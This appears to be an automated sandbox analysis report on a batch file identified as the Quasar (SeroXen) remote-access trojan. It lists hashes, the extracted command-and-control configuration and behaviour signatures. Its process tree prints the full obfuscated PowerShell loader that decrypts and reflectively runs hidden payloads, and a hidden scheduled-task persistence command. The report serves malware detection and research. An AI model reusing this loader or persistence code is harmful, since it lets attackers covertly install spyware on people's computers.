Overview

overview

10

Static

static

1

sxr-Uni.bat

windows7-x64

8

sxr-Uni.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 20:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sxr-Uni.bat

  • Size

    1004KB

  • MD5

    87135909ef2fbb7168cd05d0e39fa129

  • SHA1

    1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799

  • SHA256

    38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7

  • SHA512

    93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547

  • SSDEEP

    24576:Aj9+DnG6YVMFMTnd9x6osRvWc2mjJRiW7+wjHRjX:NGppndjT6dxjX

Score
10/10
quasarseroxenexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

uk2.localto.net:3362

Mutex

$Sxr-CHcUwDREE2aL5huOTd

Attributes
  • encryption_key

    8v1KwkaFypjEiZ1Virk0

  • install_name

    Client.exe

  • log_directory

    $sxr-cmd

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sxr-Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3148
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sxr-Uni.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sxr-Uni.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4104
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_199_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_199.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3424
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_199.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:672
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_199.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:804
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_199.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_199.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4288
            • C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
              "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:5092
            • C:\Windows\SysWOW64\wermgr.exe
              "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4288" "2888" "2752" "2960" "0" "0" "2956" "0" "0" "0" "0" "0"
              6⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              PID:1060

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    9751fcb3d8dc82d33d50eebe53abe314

    SHA1

    7a680212700a5d9f3ca67c81e0e243834387c20c

    SHA256

    ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

    SHA512

    54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    17KB

    MD5

    43cabfee5fbaa0df60e73828dd003aaf

    SHA1

    4861e1946567ca9de8908afda520c66696f048fb

    SHA256

    ebdc4be5349677e35613601d3a6a6c0ffe31922500c0440b07e20dd6fac8e349

    SHA512

    ae5246289046fb0308f843d56dfc74441b4aea82b2245abf8fd83740836278c6f13407bc59429f4c520cbcc0fa9e309fd61c2a67e0739b24ee4f2bc4bda5c7c2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
    Filesize

    409KB

    MD5

    95b900961b79bdde26d9aa9b7dd0d45f

    SHA1

    fa92ee8cb299cb3e7565c4d8fe5071a902e2fd08

    SHA256

    a3c2d3cb1d3aac5f6a85fcc8654d1f36671b4d0d9cb49c8187dc973fdc4637f0

    SHA512

    6cc027d2b156842274fc170d9dc3bf62274fecd06af8cc863d0101e559605cfc162f43fdd2fe2798446d7717b25b244365d96a6891fe7f07d01fc1e8f53bb2ad

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Install.exe
    Filesize

    164KB

    MD5

    bec10290154b8590c20abe2e49096d21

    SHA1

    ac36297e505124cdf3db5f07ee595cb1d95187ea

    SHA256

    a0739bd54451695e2a7861a6845c59079b8a08d4543f883ec63fc3d5ac357107

    SHA512

    583b0e21f13fcbc3b5a02018b30baa8fb0180ff43b7aa8cf21cfde47122cf632d5452b311bcbc2dc1acc6587510a764b01984e9b567bbec9bfadbbb4e76cf97d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwk32dmg.rwi.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_199.bat
    Filesize

    1004KB

    MD5

    87135909ef2fbb7168cd05d0e39fa129

    SHA1

    1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799

    SHA256

    38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7

    SHA512

    93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_199.vbs
    Filesize

    115B

    MD5

    4c6b0d3ba9d508d7fbf03c7172ae2573

    SHA1

    be0bb586e37f872546d884bde234abe628e5e922

    SHA256

    d769c6a56d2c7b02d7da1e38321d3423d751673af07aa9da64f9ea9164b7268a

    SHA512

    7af02be503820b0a104f70e363594331b4318917a00967772f183d4fe7bd52406fb4baeb6674f7e23c6dbfe76b66edf8738b3e2cc51adbf76941aaa066faf258

    Download Submit

  • memory/3424-49-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3424-53-0x0000000007670000-0x000000000767A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3424-59-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3424-56-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3424-55-0x0000000007800000-0x0000000007811000-memory.dmp

    Filesize

    68KB

    Download

  • memory/3424-54-0x0000000007880000-0x0000000007916000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3424-52-0x00000000074E0000-0x0000000007583000-memory.dmp

    Filesize

    652KB

    Download

  • memory/3424-50-0x0000000006820000-0x000000000683E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3424-51-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3424-38-0x00000000074A0000-0x00000000074D2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/3424-26-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3424-27-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3424-37-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3424-39-0x0000000070910000-0x000000007095C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4104-6-0x0000000005B60000-0x0000000005BC6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4104-4-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4104-24-0x000000000A5B0000-0x000000000AB54000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4104-22-0x0000000006660000-0x0000000006668000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4104-21-0x00000000066D0000-0x00000000066EA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4104-7-0x0000000005BD0000-0x0000000005C36000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4104-20-0x0000000008980000-0x0000000008FFA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4104-19-0x0000000006150000-0x000000000619C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4104-18-0x0000000006120000-0x000000000613E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4104-3-0x00000000053C0000-0x00000000059E8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4104-23-0x0000000008370000-0x0000000008462000-memory.dmp

    Filesize

    968KB

    Download

  • memory/4104-5-0x00000000052C0000-0x00000000052E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4104-17-0x0000000005C40000-0x0000000005F94000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4104-2-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4104-78-0x0000000074AF0000-0x00000000752A0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4104-1-0x0000000004C40000-0x0000000004C76000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4104-0-0x0000000074AFE000-0x0000000074AFF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4288-83-0x0000000008C20000-0x0000000008C8C000-memory.dmp

    Filesize

    432KB

    Download

  • memory/4288-84-0x0000000008E50000-0x0000000008EE2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/5092-102-0x0000000000EB0000-0x0000000000F1C000-memory.dmp

    Filesize

    432KB

    Download

  • memory/5092-111-0x00000000064F0000-0x0000000006502000-memory.dmp

    Filesize

    72KB

    Download

  • memory/5092-112-0x0000000006A30000-0x0000000006A6C000-memory.dmp

    Filesize

    240KB

    Download

  • memory/5092-114-0x0000000006A80000-0x0000000006A8A000-memory.dmp

    Filesize

    40KB

    Download